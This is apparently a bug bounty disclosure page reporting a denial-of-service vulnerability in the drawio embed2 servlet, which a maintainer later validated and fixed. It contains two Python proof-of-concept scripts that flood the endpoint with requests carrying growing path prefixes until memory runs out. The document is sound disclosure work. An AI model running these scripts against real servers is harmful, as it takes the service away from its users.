Denial of Service on embed2 servlet in jgraph/drawio

Valid

Reported on

May 19th 2022


Description

The application stores a 5MB file in a hashmap variable using a user input as a key, with a large number of requests its possible to increase the memory usage of the application and deny the access to embed2.js stencils resource

Proof of Concept

import requests

HOST="127.0.0.1:8080/embed2.js?s={0}aws4"

prefix=""
for i in range(0, 1000):
    prefix+="/"
    r = requests.get(HOST.format(prefix))
    print(i)

Before the poc execution: After:

I lowered the impact because I was not able to take down the application with this vulnerability, but after executing the POC its not possible to access the aws4 stencil anymore, this could be done to every stencil and deny the access to every stencil:

Update on report

import requests

HOST="http://127.0.0.1:8080/embed2.js?s={0}aws4"

prefix=""
try:
    for i in range(0, 5000):
        prefix+="./"
        r = requests.get(HOST.format(prefix))
        print(i)
except:
    HOST="http://127.0.0.1:8080/embed2.js?s={0}aws3d"
    try:
        for i in range(0, 5000):
            prefix+="./"
            r = requests.get(HOST.format(prefix))
            print(i)
    except:
        pass

With this poc I was able to take down the whole application

Impact

Deny the access to the stencils resource

We are processing your report and will contact the jgraph/drawio team within 24 hours. a month ago
David Benson
a month ago

Maintainer


Thanks for the report. How would you make the user request the URL so many times, create a site with JS that makes them call it over and over?

Joao Vitor Maia
a month ago

Researcher


Actually it does not need user interaction, the attacker can make it by himself executing the payload POC

Joao Vitor Maia modified the report
a month ago
Joao Vitor Maia modified the report
a month ago
Joao Vitor Maia
a month ago

Researcher


Hi, after some changes I was able to take down the whole drawio application with the payload above, so I adjusted the score

We have contacted a member of the jgraph/drawio team and are waiting to hear back a month ago
David Benson validated this vulnerability a month ago
Joao Vitor Maia has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
David Benson confirmed that a fix has been merged on 9dc0d5 a month ago
The fix bounty has been dropped
to join this conversation